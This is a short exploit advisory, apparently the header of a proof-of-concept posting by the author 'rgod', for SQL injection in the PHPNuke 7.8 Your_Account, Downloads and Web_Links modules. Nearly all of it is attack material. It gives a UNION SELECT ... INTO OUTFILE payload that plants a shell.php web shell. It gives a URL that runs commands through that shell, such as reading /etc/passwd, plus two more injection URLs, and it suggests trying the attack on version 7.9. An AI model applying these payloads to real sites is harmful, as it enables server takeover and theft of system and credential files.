PHPNuke 7.8 with all security fixes/patches "Downloads", "Web_Links" & "Your_Account" SQL INjection -> remote commands execution poc exploit there are a lot of unsanitized vars in every module, as I can see, so if magic_quotes_gpc is Off -> SQL INJECTION 1) you can go to "Your Account" and submit a username like this: ' UNION SELECT '',0,0,0,0,0,0,0,'',0 INTO OUTFILE '../../WWW/PHPNUKE/shell.php' FROM nuke_users/* login field is too small to do it manually but you can see my poc below to create a shell.php file in a writable directory then launch commands: http://[target]/[path_to_shell]/shell.php?cmd=cat%20/etc/passwd 2) the same in "Downloads" module: http://[target]/[path]/modules.php?name=Downloads&d_op=Add&url=[SQL]&title=what&description=what 3) ... and in "Web_links" module: http://[target]/[path]/modules.php?name=Web_Links&l_op=Add&title=what&description=[SQL]&url=what I have not seen 7.9 version but it can be also vulnerable, try it on it, this is my poc exploit:
PHPNuke 7.8 (possibly prior versions) remote commands execution
a script by rgod at http://rgod.altervista.org